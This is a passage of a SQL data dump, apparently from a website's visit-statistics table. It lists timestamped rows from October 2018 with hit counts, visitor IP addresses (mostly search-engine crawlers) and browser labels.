,0,0,'54.36.148.36','other'),(312977,1538800383,1,1,0,0,'66.249.66.59','chrome'),(312978,1538800405,1,1,0,0,'66.249.66.157','chrome'),(312979,1538800425,1,1,0,0,'54.36.148.184','other'),(312980,1538800451,1,1,0,0,'54.36.148.74','other'),(312981,1538800597,1,1,0,0,'51.255.65.46','other'),(312982,1538800737,1,1,0,0,'54.36.148.207','other'),(312983,1538800832,1,1,0,0,'185.94.213.154','firefox'),(312984,1538800860,1,1,0,0,'54.36.149.80','other'),(312985,1538800982,1,1,0,0,'54.36.148.246','other'),(312986,1538800999,3,3,0,0,'66.249.66.155','chrome'),(312987,1538801123,1,1,0,0,'54.36.148.191','other'),(312988,1538801219,61,61,0,0,'144.76.81.72','other'),(312989,1538801259,1,1,0,0,'54.36.148.28','other'),(312990,1538801276,1,1,0,0,'216.244.66.241','other'),(312991,1538801289,1,1,0,0,'95.163.255.92','other'),(312992,1538801291,1,1,0,0,'95.163.255.94','other'),(312993,1538801860,1,1,0,0,'54.36.149.56','other'),(312994,1538802073,1,1,0,0,'54.36.148.60','other'),(312995,1538802133,1,1,0,0,'54.36.148.189','other'),(312996,1538802135,1,1,0,0,'66.249.66.156','chrome'),(312997,1538802230,1,1,0,0,'216.244.66.241','other'),(312998,1538802288,1,1,0,0,'66.249.66.57','chrome'),(312999,1538802334,1,1,0,0,'54.36.149.47','other'),(313000,1538802358,1,1,0,0,'66.249.66.157','chrome'),(313001,1538802450,1,1,0,0,'54.36.149.94','other'),(313002,1538802699,1,1,0,0,'54.36.149.19','other'),(313003,1538802800,1,1,0,0,'157.55.39.220','other'),(313004,1538802843,1,1,0,0,'54.36.149.12','other'),(313005,1538802978,1,1,0,0,'54.36.149.15','other'),(313006,1538802991,44,44,0,0,'148.251.120.201','other'),(313007,1538803151,1,1,0,0,'157.55.39.159','other'),(313008,1538803305,1,1,0,0,'54.36.149.21','other'),(313009,1538803371,1,1,0,0,'54.36.148.212','other'),(313010,1538803532,1,1,0,0,'46.211.27.246','chrome'),(313011,1538803622,1,1,0,0,'66.249.66.156','chrome'),(313012,1538804077,1,1,0,0,'8.29.198.27','other'),(313013,1538804392,1,1,0,0,'54.36.148.35','other'),(313014,1538804462,1,1,0,0,'8.29.198.25','other'),(313015,1538804644,1,1,0,0,'216.244.66.241','other'),(313016,1538804925,1,1,0,0,'54.36.148.183','other'),(313017,1538805017,1,1,0,0,'66.249.66.61','chrome'),(313018,1538805114,14,14,0,0,'5.9.154.68','other'),(313019,1538805193,1,1,0,0,'66.249.66.157','chrome'),(313020,1538805290,1,1,0,0,'54.36.148.135','other'),(313021,1538805332,1,1,0,0,'54.36.148.215','other'),(313022,1538805407,1,1,0,0,'54.36.149.60','other'),(313023,1538805624,1,1,0,0,'54.36.148.177','other'),(313024,1538805804,4,4,0,0,'66.249.66.155','chrome'),(313025,1538805829,2,2,0,0,'66.249.66.156','chrome'),(313026,1538805961,1,1,0,0,'54.36.148.242','other'),(313027,1538806202,1,1,0,0,'66.249.66.157','chrome'),(313028,1538806233,1,1,0,0,'54.36.148.194','other'),(313029,1538806626,1,1,0,0,'54.36.148.245','other'),(313030,1538806837,1,1,0,0,'54.36.148.76','other'),(313031,1538806943,1,1,0,0,'54.36.148.169','other'),(313032,1538807185,1,1,0,0,'66.249.66.59','chrome'),(313033,1538807420,1,1,0,0,'54.36.149.40','other'),(313034,1538807765,3,3,0,0,'66.249.66.157','chrome'),(313035,1538807870,1,1,0,0,'80.252.153.33','firefox'),(313036,1538808216,2,2,0,0,'66.249.66.155','chrome'),(313037,1538808324,1,1,0,0,'54.36.148.238','other'),(313038,1538808370,3,3,0,0,'66.249.66.156','chrome'),(313039,1538808410,1,1,0,0,'66.249.66.59','chrome'),(313040,1538808476,1,1,0,0,'54.36.149.29','other'),(313041,1538808789,1,1,0,0,'54.36.148.72','other'),(313042,1538808945,1,1,0,0,'8.29.198.26','other'),(313043,1538809116,1,1,0,0,'216.244.66.241','other'),(313044,1538809183,1,1,0,0,'89.178.231.84','chrome'),(313045,1538809297,1,1,0,0,'180.76.15.135','other'),(313046,1538809610,1,1,0,0,'54.36.148.164','other'),(313047,1538809656,1,1,0,0,'54.36.148.193','other'),(313048,1538809713,1,1,0,0,'66.249.66.156','chrome'),(313049,1538809726,1,1,0,0,'54.36.149.79','other'),(313050,1538810327,1,1,0,0,'157.55.39.202','other'),(313051,1538810626,1,1,0,0,'54.36.148.238','other'),(313052,1538810761,1,1,0,0,'66.249.66.157','chrome'),(313053,1538810829,1,1,0,0,'54.36.148.231','other'),(313054,1538811003,1,1,0,0,'54.36.148.18','other'),(313055,1538811112,1,1,0,0,'54.36.148.109','other'),(313056,1538811126,1,1,0,0,'54.36.149.24','other'),(313057,1538811314,1,1,0,0,'46.229.168.138','other'),(313058,1538811372,2,2,0,0,'54.165.59.7','other'),(313059,1538811467,1,1,0,0,'54.36.148.14','other'),(313060,1538811621,1,1,0,0,'54.36.148.83','other'),(313061,1538811686,1,1,0,0,'54.36.148.103','other'),(313062,1538811742,1,1,0,0,'66.249.66.157','chrome'),(313063,1538811920,1,1,0,0,'54.36.149.85','other'),(313064,1538812123,1,1,0,0,'54.36.149.22','other'),(313065,1538812239,1,1,0,0,'157.55.39.202','other'),(313066,1538812240,1,1,0,0,'54.36.148.124','other'),(313067,1538812519,1,1,0,0,'54.36.149.29','other'),(313068,1538812864,1,1,0,0,'66.249.66.59','chrome'),(313069,1538812936,1,1,0,0,'54.36.148.229','other'),(313070,1538812960,1,1,0,0,'54.36.149.102','other'),(313071,1538813013,1,1,0,0,'54.36.149.3','other'),(313072,1538813025,1,1,0,0,'54.36.148.106','other'),(313073,1538813070,2,2,0,0,'66.249.66.155','chrome'),(313074,1538813150,1,1,0,0,'66.249.66.157','chrome'),(313075,1538813442,1,1,0,0,'54.36.148.248','other'),(313076,1538813951,1,1,0,0,'54.36.148.176','other'),(313077,1538813982,1,1,0,0,'54.36.149.85','other'),(313078,1538814158,1,1,0,0,'176.9.25.107','other'),(313079,1538814359,2,2,0,0,'66.249.66.155','chrome'),(313080,1538814383,1,1,0,0,'66.249.66.57','chrome'),(313081,1538814385,1,1,0,0,'54.36.148.28','other'),(313082,1538814499,1,1,0,0,'66.249.66.59','chrome'),(313083,1538814584,1,1,0,0,'54.36.149.60','other'),(313084,1538814675,1,1,0,0,'77.111.247.24','chrome'),(313085,1538814784,1,1,0,0,'54.36.148.212','other'),(313086,1538814905,1,1,0,0,'8.29.198.25','other'),(313087,1538814976,1,1,0,0,'54.165.59.7','other'),(313088,1538815131,1,1,0,0,'54.36.148.183','other'),(313089,1538815260,1,1,0,0,'66.249.66.157','chrome'),(313090,1538815291,1,1,0,0,'8.29.198.27','other'),(313091,1538815576,1,1,0,0,'54.36.149.102','other'),(313092,1538815582,1,1,0,0,'66.249.66.155','chrome'),(313093,1538815889,1,1,0,0,'54.165.59.7','other'),(313094,1538815982,1,1,0,0,'54.36.149.4','other'),(313095,1538816139,1,1,0,0,'54.36.148.153','other'),(313096,1538816194,2,2,0,0,'66.249.66.59','chrome'),(313097,1538816276,1,1,0,0,'66.249.66.156','chrome'),(313098,1538816327,1,1,0,0,'54.36.149.2','other'),(313099,1538816509,1,1,0,0,'54.36.149.59','other'),(313100,1538816512,1,1,0,0,'216.244.66.241','other'),(313101,1538817106,1,1,0,0,'51.255.65.46','other'),(313102,1538817206,1,1,0,0,'95.135.223.146','chrome'),(313103,1538817325,1,1,0,0,'54.36.148.79','other'),(313104,1538817385,6,6,0,0,'66.249.66.156','chrome'),(313105,1538817421,7,7,0,0,'66.249.66.155','chrome'),(313106,1538817885,1,1,0,0,'54.36.148.48','other'),(313107,1538818041,1,1,0,0,'54.36.148.127','other'),(313108,1538818200,2,2,0,0,'66.249.66.157','chrome'),(313109,1538818493,1,1,0,0,'54.36.149.41','other'),(313110,1538818661,3,3,0,0,'66.249.66.156','chrome'),(313111,1538818665,9,9,0,0,'66.249.66.155','chrome'),(313112,1538818668,1,1,0,0,'54.36.148.57','other'),(313113,1538818791,1,1,0,0,'66.249.66.59','chrome'),(313114,1538819021,2,2,0,0,'66.249.66.57','chrome'),(313115,1538819402,1,1,0,0,'54.36.149.86','other'),(313116,1538819447,1,1,0,0,'54.36.148.73','other'),(313117,1538819465,1,1,0,0,'66.249.66.157','chrome'),(313118,1538819579,1,1,0,0,'54.36.148.32','other'),(313119,1538819683,2,2,0,0,'37.54.23.36','chrome'),(313120,1538819776,1,1,0,0,'8.29.198.27','other'),(313121,1538819825,1,1,0,0,'54.36.148.197','other'),(313122,1538819954,1,1,0,0,'87.250.224.47','other'),(313123,1538819983,1,1,0,0,'178.154.244.29','other'),(313124,1538820012,1,1,0,0,'54.36.149.47','other'),(313125,1538820152,1,1,0,0,'5.45.207.19','other'),(313126,1538820251,4,4,0,0,'66.249.66.155','chrome'),(313127,1538820366,1,1,0,0,'54.36.148.35','other'),(313128,1538820446,1,1,0,0,'54.36.148.200','other'),(313129,1538820561,4,4,0,0,'66.249.66.157','chrome'),(313130,1538820831,1,1,0,0,'54.36.148.74','other'),(313131,1538820878,1,1,0,0,'54.36.149.102','other'),(313132,1538820943,2,2,0,0,'178.154.244.11','other'),(313133,1538821063,5,5,0,0,'178.154.244.29','other'),(313134,1538821411,2,2,0,0,'66.249.66.156','chrome'),(313135,1538821481,1,1,0,0,'5.45.207.19','other'),(313136,1538821486,1,1,0,0,'54.36.149.83','other'),(313137,1538821689,1,1,0,0,'66.249.66.61','chrome'),(313138,1538821729,1,1,0,0,'54.36.148.103','other'),(313139,1538821893,1,1,0,0,'54.36.149.64','other'),(313140,1538822057,2,2,0,0,'178.154.244.29','other'),(313141,1538822143,1,1,0,0,'54.36.148.86','other'),(313142,1538822383,5,5,0,0,'66.249.66.155','chrome'),(313143,1538822399,1,1,0,0,'109.162.122.193','chrome'),(313144,1538822458,2,2,0,0,'66.249.66.157','chrome'),(313145,1538822499,1,1,0,0,'54.36.149.36','other'),(313146,1538822500,1,1,0,0,'178.154.244.11','other'),(313147,1538822554,2,2,0,0,'66.249.66.156','chrome'),(313148,1538822594,1,1,0,0,'54.36.148.147','other'),(313149,1538822622,1,1,0,0,'54.36.148.16','other'),(313150,1538822643,1,1,0,0,'157.55.39.155','other'),(313151,1538822882,1,1,0,0,'54.36.148.117','other'),(313152,1538823245,1,1,0,0,'54.36.148.57','other'),(313153,1538823414,5,5,0,0,'66.249.66.155','chrome'),(313154,1538823458,1,1,0,0,'54.36.148.215','other'),(313155,1538823466,1,1,0,0,'54.36.148.36','other'),(313156,1538823504,1,1,0,0,'54.36.149.50','other'),(313157,1538823616,3,3,0,0,'66.249.66.157','chrome'),(313158,1538823869,2,2,0,0,'66.249.66.156','chrome'),(313159,1538824003,1,1,0,0,'54.36.148.99','other'),(313160,1538824413,1,1,0,0,'54.36.148.43','other'),(313161,1538824425,1,1,0,0,'66.249.66.61','chrome'),(313162,1538824574,1,1,0,0,'54.36.148.55','other'),(313163,1538824913,1,1,0,0,'66.249.66.57','chrome'),(313164,1538824979,1,1,0,0,'66.249.66.156','chrome'),(313165,1538825034,1,1,0,0,'66.249.66.59','chrome'),(313166,1538825047,1,1,0,0,'54.36.148.115','other'),(313167,1538825106,1,1,0,0,'37.17.172.132','firefox'),(313168,1538825303,2,2,0,0,'66.249.66.157','chrome'),(313169,1538825741,2,2,0,0,'8.29.198.25','other'),(313170,1538825784,3,3,0,0,'66.249.66.155','chrome'),(313171,1538826056,1,1,0,0,'54.36.148.24','other'),(313172,1538826112,1,1,0,0,'54.36.149.50','other'),(313173,1538826899,1,1,0,0,'54.36.149.94','other'),(313174,1538826922,1,1,0,0,'54.36.148.150','other'),(313175,1538827076,1,1,0,0,'54.36.149.24','other'),(313176,1538827407,1,1,0,0,'54.36.149.56','other'),(313177,1538827543,1,1,0,0,'54.36.148.10','other'),(313178,1538827775,1,1,0,0,'54.36.149.36','other'),(313179,1538828014,1,1,0,0,'54.36.149.10','other'),(313180,1538828158,1,1,0,0,'54.36.148.224','other'),(313181,1538828441,2,2,0,0,'66.249.66.157','chrome'),(313182,1538828519,1,1,0,0,'216.244.66.241','other'),(313183,1538828524,1,1,0,0,'66.249.66.57','chrome'),(313184,1538828532,3,3,0,0,'66.249.66.155','chrome'),(313185,1538828535,1,1,0,0,'178.154.244.29','other'),(313186,1538828538,4,4,0,0,'66.249.66.156','chrome'),(313187,1538828667,1,1,0,0,'54.36.148.227','other'),(313188,1538828751,1,1,0,0,'207.46.13.161','other'),(313189,1538828996,1,1,0,0,'54.36.148.242','other'),(313190,1538829114,2,2,0,0,'37.54.23.36','chrome'),(313191,1538829269,3,3,0,0,'66.249.66.153','chrome'),(313192,1538829598,1,1,0,0,'54.36.148.69','other'),(313193,1538829619,1,1,0,0,'54.36.149.2','other'),(313194,1538829748,1,1,0,0,'54.36.148.29','other'),(313195,1538829767,1,1,0,0,'54.36.148.71','other'),(313196,1538829784,1,1,0,0,'54.36.148.80','other'),(313197,1538829913,1,1,0,0,'54.36.148.225','other'),(313198,1538830079,1,1,0,0,'54.36.148.228','other'),(313199,1538830270,2,2,0,0,'207.46.13.161','other'),(313200,1538830272,1,1,0,0,'54.36.148.169','other'),(313201,1538830367,4,4,0,0,'66.249.66.155','chrome'),(313202,1538830445,4,4,0,0,'66.249.66.156','chrome'),(313203,1538830602,1,1,0,0,'8.29.198.25','other'),(313204,1538830925,1,1,0,0,'54.36.148.224','other'),(313205,1538831054,1,1,0,0,'54.36.149.78','other'),(313206,1538831210,2,2,0,0,'66.249.66.157','chrome'),(313207,1538831360,4,4,0,0,'66.249.66.155','chrome'),(313208,1538831404,4,4,0,0,'66.249.66.156','chrome'),(313209,1538831427,1,1,0,0,'54.36.148.27','other'),(313210,1538831443,1,1,0,0,'54.36.148.47','other'),(313211,1538831936,1,1,0,0,'54.36.149.11','other'),(313212,1538832082,1,1,0,0,'66.249.66.57','chrome'),(313213,1538832507,1,1,0,0,'54.36.148.75','other'),(313214,1538832679,1,1,0,0,'54.36.148.191','other'),(313215,1538832935,1,1,0,0,'54.36.148.97','other'),(313216,1538832938,1,1,0,0,'91.196.178.164','chrome'),(313217,1538833000,1,1,0,0,'66.249.66.59','chrome'),(313218,1538833118,2,2,0,0,'66.249.66.156','chrome'),(313219,1538833191,1,1,0,0,'54.36.148.226','other'),(313220,1538833267,1,1,0,0,'54.36.148.227','other'),(313221,1538833426,4,4,0,0,'66.249.66.157','chrome'),(313222,1538833528,1,1,0,0,'54.36.149.59','other'),(313223,1538833797,1,1,0,0,'54.36.148.38','other'),(313224,1538833944,1,1,0,0,'54.36.148.221','other'),(313225,1538834367,1,1,0,0,'54.36.148.238','other'),(313226,1538835147,1,1,0,0,'46.229.168.147','other'),(313227,1538835318,1,1,0,0,'216.244.66.241','other'),(313228,1538835645,1,1,0,0,'54.36.148.157','other'),(313229,1538835808,2,2,0,0,'66.249.66.155','chrome'),(313230,1538835883,3,3,0,0,'66.249.66.157','chrome'),(313231,1538835891,4,4,0,0,'66.249.66.156','chrome'),(313232,1538836052,1,1,0,0,'91.209.11.236','other'),(313233,1538836582,2,2,0,0,'8.29.198.27','other'),(313234,1538836875,1,1,0,0,'216.244.66.241','other'),(313235,1538837012,1,1,0,0,'54.36.149.31','other'),(313236,1538837242,1,1,0,0,'54.36.148.222','other'),(313237,1538837301,1,1,0,0,'54.36.149.73','other'),(313238,1538837596,1,1,0,0,'54.36.148.251','other'),(313239,1538837836,1,1,0,0,'66.249.66.157','chrome'),(313240,1538837949,1,1,0,0,'66.249.66.61','chrome'),(313241,1538838017,1,1,0,0,'66.249.66.156','chrome'),(313242,1538838025,1,1,0,0,'66.249.66.59','chrome'),(313243,1538838088,5,5,0,0,'66.249.66.155','chrome'),(313244,1538838177,1,1,0,0,'54.36.148.225','other'),(313245,1538838293,1,1,0,0,'54.36.149.57','other'),(313246,1538838520,1,1,0,0,'54.36.149.67','other'),(313247,1538838547,1,1,0,0,'54.36.149.26','other'),(313248,1538839108,2,2,0,0,'66.249.66.155','chrome'),(313249,1538839206,1,1,0,0,'54.36.148.41','other'),(313250,1538839424,6,6,0,0,'66.249.66.156','chrome'),(313251,1538839450,1,1,0,0,'54.36.148.207','other'),(313252,1538839471,1,1,0,0,'54.36.148.238','other'),(313253,1538839513,1,1,0,0,'188.230.43.254','other'),(313254,1538839518,1,1,0,0,'54.36.148.141','other'),(313255,1538839604,1,1,0,0,'91.209.11.236','other'),(313256,1538839693,1,1,0,0,'54.36.149.100','other'),(313257,1538839804,1,1,0,0,'54.36.148.82','other'),(313258,1538839814,1,1,0,0,'66.249.66.157','chrome'),(313259,1538839858,1,1,0,0,'54.36.149.27','other'),(313260,1538840007,1,1,0,0,'37.17.172.132','firefox'),(313261,1538840022,1,1,0,0,'54.36.148.58','other'),(313262,1538840083,1,1,0,0,'66.249.66.155','chrome'),(313263,1538840284,1,1,0,0,'54.36.148.77','other'),(313264,1538840346,1,1,0,0,'54.36.148.40','other'),(313265,1538840644,1,1,0,0,'54.36.148.63','other'),(313266,1538841054,1,1,0,0,'66.249.66.57','chrome'),(313267,1538841154,1,1,0,0,'54.36.149.36','other'),(313268,1538841167,1,1,0,0,'54.36.149.5','other'),(313269,1538841171,5,5,0,0,'66.249.66.155','chrome'),(313270,1538841199,4,4,0,0,'66.249.66.156','chrome'),(313271,1538841387,1,1,0,0,'66.249.66.59','chrome'),(313272,1538841434,1,1,0,0,'8.29.198.25','other'),(313273,1538841488,1,1,0,0,'180.76.15.157','other'),(313274,1538841572,2,2,0,0,'95.216.41.162','other'),(313275,1538841685,1,1,0,0,'54.36.148.131','other'),(313276,1538841831,1,1,0,0,'54.36.149.92','other'),(313277,1538841856,1,1,0,0,'216.244.66.241','other'),(313278,1538841994,1,1,0,0,'54.36.148.77','other'),(313279,1538842431,3,3,0,0,'66.249.66.156','chrome'),(313280,1538842441,2,2,0,0,'66.249.66.155','chrome'),(313281,1538842491,1,1,0,0,'54.36.149.37','other'),(313282,1538842559,1,1,0,0,'40.77.167.72','other'),(313283,1538842561,5,5,0,0,'178.154.244.29','other'),(313284,1538842735,3,3,0,0,'66.249.66.157','chrome'),(313285,1538842798,1,1,0,0,'54.36.148.191','other'),(313286,1538842890,1,1,0,0,'54.36.148.49','other'),(313287,1538842910,1,1,0,0,'54.36.148.24','other'),(313288,1538843070,1,1,0,0,'178.154.244.11','other'),(313289,1538843102,1,1,0,0,'216.244.66.241','other'),(313290,1538843365,2,2,0,0,'66.249.66.57','chrome'),(313291,1538843367,4,4,0,0,'66.249.66.59','chrome'),(313292,1538843434,5,5,0,0,'66.249.66.156','chrome'),(313293,1538843589,1,1,0,0,'54.36.149.4','other'),(313294,1538843637,4,4,0,0,'66.249.66.155','chrome'),(313295,1538843670,2,2,0,0,'66.249.66.61','chrome'),(313296,1538844189,4,4,0,0,'66.249.66.157','chrome'),(313297,1538844321,1,1,0,0,'37.54.23.36','chrome'),(313298,1538844465,2,2,0,0,'66.249.66.156','chrome'),(313299,1538844718,1,1,0,0,'66.249.66.59','chrome'),(313300,1538844725,1,1,0,0,'54.36.149.74','other'),(313301,1538844942,1,1,0,0,'54.36.148.92','other'),(313302,1538845824,1,1,0,0,'54.36.148.207','other'),(313303,1538846001,1,1,0,0,'54.36.148.203','other'),(313304,1538846033,1,1,0,0,'54.36.149.93','other'),(313305,1538846086,2,2,0,0,'66.249.66.155','chrome'),(313306,1538846624,2,2,0,0,'66.249.66.59','chrome'),(313307,1538846656,2,2,0,0,'216.244.66.241','other'),(313308,1538846736,1,1,0,0,'66.249.66.156','chrome'),(313309,1538846760,1,1,0,0,'37.17.172.132','firefox'),(313310,1538847018,1,1,0,0,'195.245.221.90','other'),(313311,1538847064,1,1,0,0,'54.36.149.51','other'),(313312,1538847085,1,1,0,0,'95.163.255.92','other'),(313313,1538847133,1,1,0,0,'66.249.66.57','chrome'),(313314,1538847382,1,1,0,0,'66.249.65.211','chrome'),(313315,1538847384,1,1,0,0,'54.36.148.170','other'),(313316,1538847419,1,1,0,0,'8.29.198.27','other'),(313317,1538847536,1,1,0,0,'66.249.65.213','chrome'),(313318,1538847610,1,1,0,0,'54.36.148.252','other'),(313319,1538847679,2,2,0,0,'66.249.65.209','chrome'),(313320,1538847813,1,1,0,0,'8.29.198.25','other'),(313321,1538848227,1,1,0,0,'66.249.73.30','chrome'),(313322,1538848456,2,2,0,0,'213.231.25.77','chrome'),(313323,1538848723,3,3,0,0,'144.76.96.236','other'),(313324,1538848946,1,1,0,0,'54.36.148.253','other'),(313325,1538849039,3,3,0,0,'66.249.65.211','chrome'),(313326,1538849106,1,1,0,0,'66.249.65.213','chrome'),(313327,1538849114,4,4,0,0,'66.249.65.209','chrome'),(313328,1538849211,2,2,0,0,'216.244.66.241','other'),(313329,1538849279,1,1,0,0,'54.36.149.40','other'),(313330,1538849687,1,1,0,0,'54.36.148.210','other'),(313331,1538849750,1,1,0,0,'54.36.149.103','other'),(313332,1538849865,1,1,0,0,'157.55.39.202','other'),(313333,1538849928,1,1,0,0,'193.106.30.98','firefox'),(313334,1538849988,1,1,0,0,'54.36.148.163','other'),(313335,1538849990,1,1,0,0,'54.36.149.91','other'),(313336,1538850022,3,3,0,0,'66.249.65.213','chrome'),(313337,1538850166,4,4,0,0,'66.249.65.209','chrome'),(313338,1538850199,4,4,0,0,'95.213.141.126','opera'),(313339,1538850237,1,1,0,0,'54.36.148.87','other'),(313340,1538850287,1,1,0,0,'40.77.167.10','other'),(313341,1538850499,1,1,0,0,'54.93.194.5','other'),(313342,1538850571,1,1,0,0,'54.36.149.63','other'),(313343,1538851001,1,1,0,0,'54.36.148.212','other'),(313344,1538851092,1,1,0,0,'5.45.207.79','other'),(313345,1538851125,3,3,0,0,'178.154.244.11','other'),(313346,1538851359,2,2,0,0,'66.249.65.213','chrome'),(313347,1538851496,2,2,0,0,'216.244.66.241','other'),(313348,1538851576,1,1,0,0,'54.36.148.159','other'),(313349,1538851624,1,1,0,0,'213.180.203.9','other'),(313350,1538851695,2,2,0,0,'176.126.163.238','chrome'),(313351,1538851881,1,1,0,0,'54.36.148.92','other'),(313352,1538851900,1,1,0,0,'54.36.149.16','other'),(313353,1538851943,2,2,0,0,'66.249.65.211','chrome'),(313354,1538852020,1,1,0,0,'157.55.39.202','other'),(313355,1538852050,2,2,0,0,'66.249.65.209','chrome'),(313356,1538852078,1,1,0,0,'46.229.168.148','other'),(313357,1538852101,1,1,0,0,'66.249.73.28','chrome'),(313358,1538852150,1,1,0,0,'54.36.148.116','other'),(313359,1538852209,1,1,0,0,'95.24.11.245','msie'),(313360,1538852269,1,1,0,0,'8.29.198.26','other'),(313361,1538852352,3,3,0,0,'178.154.244.11','other'),(313362,1538852382,1,1,0,0,'54.36.149.70','other'),(313363,1538852447,1,1,0,0,'216.244.66.241','other'),(313364,1538852503,1,1,0,0,'54.36.148.49','other'),(313365,1538852671,1,1,0,0,'94.179.33.45','msie'),(313366,1538852733,3,3,0,0,'178.154.244.29','other'),(313367,1538852793,1,1,0,0,'54.36.149.19','other'),(313368,1538852837,3,3,0,0,'66.249.65.213','chrome'),(313369,1538852923,1,1,0,0,'5.45.207.79','other'),(313370,1538852974,1,1,0,0,'66.249.65.209','chrome'),(313371,1538852980,2,2,0,0,'66.249.65.211','chrome'),(313372,1538853022,1,1,0,0,'54.36.148.75','other'),(313373,1538853147,1,1,0,0,'54.36.148.105','other'),(313374,1538853283,1,1,0,0,'54.36.148.52','other'),(313375,1538853346,3,3,0,0,'178.154.244.11','other'),(313376,1538853575,1,1,0,0,'180.76.15.25','other'),(313377,1538853811,1,1,0,0,'178.154.244.29','other'),(313378,1538854157,1,1,0,0,'87.250.224.47','other'),(313379,1538854279,1,1,0,0,'54.36.148.98','other'),(313380,1538854313,1,1,0,0,'54.36.148.38','other'),(313381,1538854410,2,2,0,0,'5.45.207.79','other'),(313382,1538854452,2,2,0,0,'178.154.244.11','other'),(313383,1538854512,1,1,0,0,'54.36.149.102','other'),(313384,1538854592,1,1,0,0,'66.249.73.29','chrome'),(313385,1538854603,1,1,0,0,'54.36.148.201','other'),(313386,1538854640,2,2,0,0,'66.249.65.211','chrome'),(313387,1538854669,2,2,0,0,'66.249.65.209','chrome'),(313388,1538854697,1,1,0,0,'54.36.149.41','other'),(313389,1538854864,1,1,0,0,'141.8.142.103','other'),(313390,1538854984,3,3,0,0,'216.244.66.241','other'),(313391,1538855074,3,3,0,0,'178.154.244.29','other'),(313392,1538855112,1,1,0,0,'5.45.207.19','other'),(313393,1538855338,1,1,0,0,'37.9.113.148','other'),(313394,1538855393,1,1,0,0,'66.249.73.28','chrome'),(313395,1538855429,1,1,0,0,'40.77.167.27','other'),(313396,1538855477,1,1,0,0,'87.250.224.47','other'),(313397,1538855607,2,2,0,0,'66.249.65.209','chrome'),(313398,1538855645,2,2,0,0,'66.249.65.211','chrome'),(313399,1538855719,1,1,0,0,'66.249.65.213','chrome'),(313400,1538855923,1,1,0,0,'46.229.168.143','other'),(313401,1538856121,1,1,0,0,'54.36.148.229','other'),(313402,1538856137,1,1,0,0,'66.249.73.29','chrome'),(313403,1538856155,1,1,0,0,'54.36.148.25','other'),(313404,1538856286,2,2,0,0,'178.154.244.29','other'),(313405,1538856468,1,1,0,0,'207.46.13.92','other'),(313406,1538856541,1,1,0,0,'54.36.148.57','other'),(313407,1538856710,3,3,0,0,'66.249.65.211','chrome'),(313408,1538856934,1,1,0,0,'54.36.148.232','other'),(313409,1538856959,1,1,0,0,'216.244.66.241','other'),(313410,1538857006,1,1,0,0,'54.36.148.20','other'),(313411,1538857126,1,1,0,0,'54.36.148.128','other'),(313412,1538857315,2,2,0,0,'66.249.65.213','chrome'),(313413,1538857561,1,1,0,0,'54.36.148.12','other'),(313414,1538857823,1,1,0,0,'37.17.172.132','firefox'),(313415,1538858254,1,1,0,0,'8.29.198.26','other'),(313416,1538858650,1,1,0,0,'8.29.198.25','other'),(313417,1538858657,1,1,0,0,'54.36.148.254','other'),(313418,1538858683,2,2,0,0,'66.249.65.209','chrome'),(313419,1538858758,1,1,0,0,'54.36.148.231','other'),(313420,1538858769,1,1,0,0,'207.46.13.92','other'),(313421,1538858926,1,1,0,0,'54.36.148.163','other'),(313422,1538859161,1,1,0,0,'54.36.149.16','other'),(313423,1538859169,2,2,0,0,'66.249.65.213','chrome'),(313424,1538859329,2,2,0,0,'66.249.65.211','chrome'),(313425,1538859330,1,1,0,0,'54.36.148.96','other'),(313426,1538859364,1,1,0,0,'54.36.148.71','other'),(313427,1538859586,1,1,0,0,'54.36.148.17','other'),(313428,1538859660,1,1,0,0,'66.249.65.209','chrome'),(313429,1538859691,1,1,0,0,'52.53.201.78','chrome'),(313430,1538859720,2,2,0,0,'216.244.66.241','other'),(313431,1538859733,1,1,0,0,'54.36.148.92','other'),(313432,1538859760,1,1,0,0,'54.36.148.195','other'),(313433,1538860006,1,1,0,0,'178.154.244.29','other'),(313434,1538860109,1,1,0,0,'54.36.148.132','other'),(313435,1538860158,1,1,0,0,'178.154.244.11','other'),(313436,1538860171,1,1,0,0,'54.36.149.5','other'),(313437,1538860241,2,2,0,0,'66.249.65.211','chrome'),(313438,1538860302,1,1,0,0,'66.249.73.30','chrome'),(313439,1538860623,4,4,0,0,'66.249.65.209','chrome'),(313440,1538860895,1,1,0,0,'54.36.149.91','other'),(313441,1538861012,1,1,0,0,'54.36.148.207','other'),(313442,1538861448,1,1,0,0,'5.45.207.79','other'),(313443,1538861563,2,2,0,0,'66.249.65.213','chrome'),(313444,1538861655,1,1,0,0,'178.154.244.11','other'),(313445,1538861661,1,1,0,0,'5.45.207.19','other'),(313446,1538861893,1,1,0,0,'54.36.148.129','other'),(313447,1538862002,1,1,0,0,'216.244.66.241','other'),(313448,1538862205,1,1,0,0,'54.36.149.74','other'),(313449,1538862277,1,1,0,0,'37.73.163.120','other'),(313450,1538862461,1,1,0,0,'54.36.148.207','other'),(313451,1538862483,1,1,0,0,'66.249.65.211','chrome'),(313452,1538863079,1,1,0,0,'54.36.148.13','other'),(313453,1538863092,1,1,0,0,'8.29.198.25','other'),(313454,1538863238,1,1,0,0,'54.36.148.252','other'),(313455,1538863267,1,1,0,0,'54.36.149.73','other'),(313456,1538863652,1,1,0,0,'37.73.163.120','other'),(313457,1538864064,1,1,0,0,'54.36.148.208','other'),(313458,1538864184,1,1,0,0,'54.36.149.20','other'),(313459,1538864288,1,1,0,0,'66.249.65.211','chrome'),(313460,1538864429,1,1,0,0,'54.36.148.160','other'),(313461,1538864518,1,1,0,0,'54.36.149.75','other'),(313462,1538864633,1,1,0,0,'94.179.33.45','msie'),(313463,1538864663,1,1,0,0,'66.249.66.155','chrome'),(313464,1538864782,1,1,0,0,'54.36.148.115','other'),(313465,1538864970,1,1,0,0,'54.36.149.10','other'),(313466,1538865161,1,1,0,0,'54.36.149.103','other'),(313467,1538865267,2,2,0,0,'216.244.66.241','other'),(313468,1538865316,1,1,0,0,'54.36.148.141','other'),(313469,1538865388,1,1,0,0,'54.36.148.73','other'),(313470,1538865510,1,1,0,0,'207.46.13.154','other'),(313471,1538865525,1,1,0,0,'54.36.148.140','other'),(313472,1538866526,1,1,0,0,'185.24.218.173','other'),(313473,1538866612,1,1,0,0,'54.36.148.182','other'),(313474,1538866910,1,1,0,0,'54.36.148.48','other'),(313475,1538867177,2,2,0,0,'216.244.66.241','other'),(313476,1538867296,1,1,0,0,'37.17.172.132','firefox'),(313477,1538867311,2,2,0,0,'66.249.65.213','chrome'),(313478,1538867369,1,1,0,0,'66.249.65.209','chrome'),(313479,1538867458,1,1,0,0,'54.36.148.243','other'),(313480,1538867733,1,1,0,0,'54.36.148.129','other'),(313481,1538867933,1,1,0,0,'66.249.65.211','chrome'),(313482,1538868266,1,1,0,0